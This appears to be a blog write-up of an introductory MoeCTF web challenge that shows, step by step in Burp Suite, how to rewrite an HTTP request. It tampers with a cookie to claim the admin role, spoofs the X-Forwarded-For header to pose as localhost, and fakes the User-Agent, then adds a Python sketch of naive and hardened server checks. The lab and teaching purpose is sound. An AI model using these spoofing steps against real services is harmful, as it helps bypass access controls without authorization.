Changing GET to POST and adding POST parameters in Burp Suite | 李青帝


Changing GET to POST and adding POST parameters in Burp Suite

2023/9/17 CTF burpsuite POST GET

[MoeCTF]http

this is GET method,

# your mission:

1.use parameter: UwU=u
2.post **form**: Luv=u
3.use admin character
4.request from 127.0.0.1
5.use browser 'MoeBrowser'
Complete All Missions

Captured request:

GET / HTTP/1.1
Host: localhost:59172
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: character=guest
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Send the request to Repeater.

Based on the mission requirements:

1. GET: UwU=u

2. POST: Luv=u

3. Cookie: character=admin

4. X-Forwarded-For: 127.0.0.1

5. User-Agent: MoeBrowser

After the modifications, the request becomes:

POST /?UwU=u HTTP/1.1
Host: 127.0.0.1:59172
User-Agent: MoeBrowser
X-Forwarded-For: 127.0.0.1
Connection: close
Cookie: character=admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

Luv=u

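Detailed solution steps:

1. Change GET / HTTP/1.1 to GET /?UwU=u HTTP/1.1

Alternatively, add an entry in Params with Type: URL, Name: UwU, Value: u

2. Change GET /?UwU=u HTTP/1.1 to POST /?UwU=u HTTP/1.1

In Params, add an entry with Type: body, Name: Luv, Value: u

3. Change Cookie: character=guest to Cookie: character=admin

4. Add X-Forwarded-For: 127.0.0.1 below the User-Agent header

Its purpose: it tells the server that the request's source address is 127.0.0.1

5. Change User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 to User-Agent: MoeBrowser

Note: the Firefox extension **hackbar v2** can also be used to solve this challenge.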
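
The five changes above touch five different parts of the request (query string, form body, cookie and two headers), all of which the client controls. The Python sketch below is an added example, not the challenge's source code: missions() is a hypothetical reconstruction of the server's checks, and source_is_loopback() is a hardened form of check 4. It assumes a single trusted reverse proxy that appends the real peer address to X-Forwarded-For.

```python
from urllib.parse import urlsplit, parse_qs
from http.cookies import SimpleCookie

# Modified request from the write-up (constructed here with CRLF line endings).
MODIFIED = (
    "POST /?UwU=u HTTP/1.1\r\n"
    "Host: 127.0.0.1:59172\r\n"
    "User-Agent: MoeBrowser\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n"
    "Cookie: character=admin\r\n"
    "Content-Length: 5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "Luv=u"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, query, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # A form body is only read when Content-Type says so, up to Content-Length.
    length = int(headers.get("content-length", 0))
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body.encode()[:length].decode())
    return method, parse_qs(urlsplit(target).query), headers, form

def missions(raw):
    """Hypothetical server-side checks mirroring the five missions."""
    method, query, headers, form = parse_request(raw)
    cookie = SimpleCookie(headers.get("cookie", ""))
    return [
        query.get("UwU") == ["u"],                                       # 1
        method == "POST" and form.get("Luv") == ["u"],                   # 2
        "character" in cookie and cookie["character"].value == "admin",  # 3
        headers.get("x-forwarded-for") == "127.0.0.1",                   # 4 (naive)
        headers.get("user-agent") == "MoeBrowser",                       # 5
    ]

def source_is_loopback(peer_ip, headers, trusted_proxies=frozenset()):
    """Hardened check 4: honor X-Forwarded-For only from a trusted proxy."""
    if peer_ip in trusted_proxies and "x-forwarded-for" in headers:
        peer_ip = headers["x-forwarded-for"].split(",")[-1].strip()
    return peer_ip == "127.0.0.1"
```

In this sketch, removing the Content-Type header or leaving Content-Length at 0 makes check 2 fail even though the body is present, which is why the modified request carries both headers.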